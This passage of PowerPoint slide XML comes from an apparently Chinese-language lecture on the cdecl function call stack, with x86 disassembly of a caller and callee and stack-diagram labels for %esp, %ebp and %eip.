        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6099368" y="2208367"/>
            <a:ext cx="1847033" cy="365600"/>
            <a:chOff x="3512200" y="1633500"/>
            <a:chExt cx="1385275" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Shape 265"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3512200" y="1633500"/>
              <a:ext cx="9006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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="266" name="Shape 266"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2102375"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="268" name="Shape 268"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="269" name="Shape 269"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{683F1B6D-43BA-4E9B-88E9-D2ED8F8A15B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5242FB6-B2FC-4E5A-8279-67DC58FB085A}"/>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5" name="Shape 275"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Shape 276"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>sub    $0x10,%esp</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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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buSzPts val="1100"/>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280" name="Shape 280"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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buSzPts val="1100"/>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281" name="Shape 281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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buSzPts val="1100"/>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282" name="Shape 282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="283" name="Shape 283"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="284" name="Shape 284"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="285" name="Shape 285"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="286" name="Shape 286"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="3847279"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="287" name="Shape 287"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="288" name="Shape 288"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="289" name="Shape 289"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2314981"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="290" name="Shape 290"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="291" name="Shape 291"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A8638DC-FA4E-4FAA-AC7E-C720DB63C027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05F0217E-665E-4988-AC98-10555AAA4432}"/>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Shape 297"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Shape 298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x3</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1a:   6a 02           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x2</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1c:   6a 01           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333"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1e:   e8 fc ff ff ff  call   1f &lt;caller+0xd&gt;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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Shape 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Shape 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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302" name="Shape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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buSzPts val="1100"/>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303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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buSzPts val="1100"/>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304" name="Shape 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="305" name="Shape 305"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="306" name="Shape 306"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="307" name="Shape 307"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="308" name="Shape 308"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444788" y="5076241"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="Shape 309"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="310" name="Shape 310"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="17637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311" name="Shape 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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3</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="Shape 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="Shape 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="314" name="Shape 314"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="2922700"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="315" name="Shape 315"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
